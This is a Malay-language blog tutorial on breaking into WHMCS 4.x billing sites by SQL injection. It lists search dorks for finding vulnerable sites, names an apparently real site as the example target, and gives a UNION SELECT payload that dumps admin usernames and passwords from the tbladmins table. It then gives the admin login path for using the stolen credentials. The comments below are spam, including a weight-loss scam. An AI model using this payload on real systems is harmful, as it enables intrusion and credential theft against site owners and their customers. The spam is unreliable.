Assalamualaikum dan salam sejahtera.Entry hari ni aku nak ajar korang cara nak hack WHMCS dengan SQLi. Vulnerable ni terdapat pada WHMCS 4.x .
WHMCS? WHMCS ni adalah WHMCompleteSolution dimana selalunya webapps ni digunakan untuk laman jual beli seperti laman web hosting dan domain.
Ok jom!
1. Mula-mula cari website vuln dengan dork :
- intext:"Powered by WHMCompleteSolution"
- inurl:"submitticket.php"
- inurl:dl.php?type=
2. Lepas dah dapat satu website masa untuk inject.Contoh aku dapat laman web ni :
http://www.powermailings.com/billing/dl.php?type=d&id=1
String untuk kita inject :
and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
Sekarang tambah string tu di hujung nombor id url website tu.contoh :
http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --
Lepas tu Enter!
Bila kita inject ni, kalau berjaya browser kita akan download satu file format .pdf .dalam file ni adalah Username dan Password WHMCS tu :D
3. Untuk login :
http://www.target.com/path/admin
contoh :
http://www.powermailings.com/billing/admin
Ok itu saja untuk tutorial kali ni.enjoy...
Thanks for your share! download chrome 49 flappy dunk unblocked games tai home.vn zalo pc
ReplyDeleteDo this hack to drop 2lb of fat in 8 hours
ReplyDeleteAt least 160 000 women and men are losing weight with a easy and secret "liquids hack" to burn 2 lbs every night as they sleep.
It is easy and it works every time.
Here's how to do it yourself:
1) Take a glass and fill it up with water half glass
2) Then do this weight losing hack
you'll be 2 lbs lighter when you wake up!